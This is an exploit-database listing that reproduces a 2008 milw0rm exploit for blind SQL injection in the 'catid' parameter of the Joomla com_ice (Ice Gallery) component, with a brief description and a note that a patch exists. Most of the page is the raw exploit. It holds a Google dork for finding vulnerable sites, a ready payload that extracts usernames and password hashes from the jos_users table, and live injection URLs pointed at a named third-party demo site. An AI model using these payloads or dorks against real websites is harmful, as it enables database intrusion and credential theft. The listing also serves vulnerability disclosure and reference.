header-logo
Suggest Exploit
vendor:
Ice Gallery
by:
boom3rang
7.5
CVSS
HIGH
Blind SQL injection
89
CWE
Product Name: Ice Gallery
Affected Version From: 0.5 beta 2
Affected Version To: 0.5 beta 2
Patch Exists: YES
Related CWE: N/A
CPE: a:markus_donhauser:ice_gallery
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Joomla Component com_ice(catid) Blind SQL-injection

Joomla Component com_ice(catid) is vulnerable to Blind SQL injection. An attacker can inject malicious SQL code in the 'catid' parameter of the vulnerable component. This can be exploited to gain access to the database and extract sensitive information such as usernames and passwords.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to update the component to the latest version.
Source

Exploit-DB raw data:

#############################################################
Joomla Component com_ice(catid) Blind SQL-injection
#############################################################


###################################################
#[~] Author        :  boom3rang 
#[~] Greetz        :  H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
#[~] Vulnerability :  Blind SQL injection 
#[~] Google Dork   :  inurl:com_ice "catid"
--------------------------------------------------
#[!] <name>Ice Gallery</name>
#[!] <creationDate>29/08/06</creationDate>
#[!] <author>Markus Donhauser</author>
#[!] <authorEmail>ice.gallery@gmx.net</authorEmail>
#[!] <version>0.5 beta 2</version>
###################################################

Example:
http://localHost/path/index.php?option=com_ice&catid=1[SQL code]


SQL code:
and ascii(substring((SELECT concat(username,0x3a,password) from jos_users limit 0,1),1,1))>96


LiveDEMO:

http://www.komponenten.joomlademo.de/index.php?option=com_ice&catid=1 and substring(@@version,1,1)=4   >>(False)

http://www.komponenten.joomlademo.de/index.php?option=com_ice&catid=1 and substring(@@version,1,1)=5   >>(True)

http://www.komponenten.joomlademo.de/index.php?option=com_ice&catid=1 and ascii(substring((SELECT concat(username,0x3a,password) from jos_users limit 0,1),1,1))>96




##############################
#[!] Proud 2 be Albanian
#[!] Proud 2 be Muslim
#[!] United States of Albania
##############################

# milw0rm.com [2008-12-24]

Navigation

Suggest Exploit

Services By CQR